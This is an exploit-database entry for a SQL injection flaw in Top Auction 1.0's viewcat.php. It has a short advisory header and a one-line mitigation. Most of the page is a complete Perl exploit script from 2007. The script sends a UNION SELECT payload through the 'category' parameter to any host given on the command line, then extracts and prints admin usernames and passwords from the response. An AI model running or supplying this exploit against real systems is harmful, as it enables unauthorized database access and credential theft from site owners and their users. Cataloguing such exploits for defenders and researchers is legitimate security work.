header-logo
Suggest Exploit
vendor:
Top Auction
by:
ajann
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Top Auction
Affected Version From: Top Auction 1.0
Affected Version To: Top Auction 1.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Top Auction 1.0 (viewcat.php) Remote Blind SQL Injection Exploit

This exploit takes advantage of a blind SQL injection vulnerability in Top Auction 1.0's viewcat.php script. By manipulating the 'category' parameter, an attacker can execute arbitrary SQL queries and retrieve sensitive information from the database, such as usernames and passwords.

Mitigation:

To mitigate this vulnerability, the vendor should implement proper input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#[Script Name: Top Auction 1.0 (viewcat.php) Remote Blind SQL Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(
#[S.Page     : http://www.phplabs.com
#[$$         : 39.95$
#[..         : ajann,Turkey

use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[//   	Top Auction 1.0 (viewcat.php) Remote Blind SQL Injection Exploit
[//                   Usage: exploit.pl [target]
[//                   Example: exploit.pl victim.com
[//                   Example: exploit.pl victim.com
[//                           Vuln&Exp : ajann
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/viewcat.php?category=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);

if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}

if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
 }


$target = "-1%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),nick,char(112,97,115,115,58),password),3%20from%20users/*";
$target = $host.$dir.$file.$target;

#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

if ($answer =~ /pass:(.*?)<\/title>/){
print "+ Password: $1\n";
}

if ($answer =~ /Syntax error/) { 
print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n";
exit(); 
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : (  \n";
print "+**********************************************************************+\n";
exit(); 
}
 }

# milw0rm.com [2007-03-11]